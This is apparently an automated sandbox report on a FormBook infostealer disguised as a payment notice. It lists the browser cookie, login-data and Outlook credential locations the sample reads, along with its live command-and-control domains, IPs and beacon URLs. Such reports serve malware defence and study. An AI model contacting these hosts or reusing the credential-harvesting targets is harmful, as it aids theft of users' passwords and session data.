Source: Yara match	File source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_81
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_XP
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_XPe
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_VISTA
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_7
Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458665245.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3759431434.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3761974191.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761586169.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3762066733.0000000002430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1458731387.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_009B1204
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_009B1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	341 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Notification Confirmation 010_01_2025.exe	71%	ReversingLabs	Win32.Backdoor.FormBook
Payment Notification Confirmation 010_01_2025.exe	67%	Virustotal		Browse
Payment Notification Confirmation 010_01_2025.exe	100%	Avira	DR/AutoIt.Gen8
Payment Notification Confirmation 010_01_2025.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.3xfootball.com/fo8o/?DZb=zf440xcx6XAL&6d6p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/?DZb=zf440xcx6XAL&6d6p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?DZb=zf440xcx6XAL&6d6p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh	100%	Avira URL Cloud	malware
http://www.empowermedeco.com/fo8o/?6d6p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&DZb=zf440xcx6XAL	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?DZb=zf440xcx6XAL&6d6p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG	100%	Avira URL Cloud	malware
http://www.empowermedeco.com	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	malware
https://www.empowermedeco.com/fo8o/?6d6p=mxnR	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/?6d6p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&DZb=zf440xcx6XAL	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elettrosistemista.zip	195.110.124.133	true	false	high
empowermedeco.com	217.196.55.202	true	false	high
www.3xfootball.com	154.215.72.110	true	false	high
www.goldenjade-travel.com	116.50.37.244	true	false	high
www.rssnewscast.com	91.195.240.94	true	false	high
www.techchains.info	66.29.149.46	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.magmadokum.com	unknown	unknown	true	unknown
www.donnavariedades.com	unknown	unknown	false	high
www.660danm.top	unknown	unknown	true	unknown
www.joyesi.xyz	unknown	unknown	false	high
www.liangyuen528.com	unknown	unknown	true	unknown
www.kasegitai.tokyo	unknown	unknown	true	unknown
www.empowermedeco.com	unknown	unknown	false	high
www.k9vyp11no3.cfd	unknown	unknown	true	unknown
www.elettrosistemista.zip	unknown	unknown	false	high
www.shenzhoucui.com	unknown	unknown	true	unknown
www.antonio-vivaldi.mobi	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.goldenjade-travel.com/fo8o/?DZb=zf440xcx6XAL&6d6p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/	false		high
http://www.3xfootball.com/fo8o/?DZb=zf440xcx6XAL&6d6p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY	true	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false		high
http://www.magmadokum.com/fo8o/?DZb=zf440xcx6XAL&6d6p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL	true	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/	false		high
http://www.elettrosistemista.zip/fo8o/?DZb=zf440xcx6XAL&6d6p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG	true	Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/	false		high
http://www.rssnewscast.com/fo8o/?6d6p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&DZb=zf440xcx6XAL	true	Avira URL Cloud: malware	unknown
http://www.empowermedeco.com/fo8o/?6d6p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&DZb=zf440xcx6XAL	true	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/	false		high
http://www.techchains.info/fo8o/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.empowermedeco.com	AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3761974191.0000000003006000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000005.00000002.3765040017.0000000006A70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3763664515.0000000004BCE000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000412E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.000000000412E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000005.00000002.3763664515.0000000004EF2000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004452000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?6d6p=mxnR	netbtugc.exe, 00000005.00000002.3763664515.000000000553A000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004A9A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000005.00000002.3763664515.0000000004EF2000.00000004.10000000.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000002.3762597741.0000000004452000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000005.00000003.1643021546.00000000084BE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589872
Start date and time:	2025-01-13 09:25:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Notification Confirmation 010_01_2025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@15/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 45 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:53:46	API Interceptor	11835884x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	https://afwkqc.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	https://wap.sunblock-pro.com/	Get hash	malicious	Unknown	Browse	154.193.113.232
	i686.elf	Get hash	malicious	Mirai	Browse	156.244.6.20
	https://www.xietaoz.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://wap.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://m.activeselfie.com/	Get hash	malicious	Unknown	Browse	154.193.113.232
	http://m.ccsurj.org/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://www.activeselfie.com/	Get hash	malicious	Unknown	Browse	154.193.113.233
	http://m.yanhaiegou.com/	Get hash	malicious	Unknown	Browse	154.193.118.37
	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
REGISTER-ASIT	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
SEDO-ASDE	WBI835q8qr.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	http://thehalobun.com/	Get hash	malicious	HTMLPhisher	Browse	91.195.240.19
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\intersentimental

Download File

Process:	C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe
File Type:	data
Category:	modified
Size (bytes):	270848
Entropy (8bit):	7.995441279910447
Encrypted:	true
SSDEEP:	6144:4ayi/5qKzt/YTur55FdoHj+YmdDM3HAW6ppIMncU:AcqKz9YTaLdOj+YEwMrILU
MD5:	545219F1394612D40189BE29319AD821
SHA1:	26D88182A0ADC730249264DEB4BE588E57B3E6B7
SHA-256:	E7DC8533F3AF065F77398A2532372BB73FA0E0AAB452ABB5444780C882AA6615
SHA-512:	E4696551E02773349CE440BBEC168FB13F4098C78831E5BA6F361FF5B51EC0634970301F369877A77DE4AD17E6EE022AE42C25FFBFD7DE20EFCF542667C7E3ED
Malicious:	false
Reputation:	low
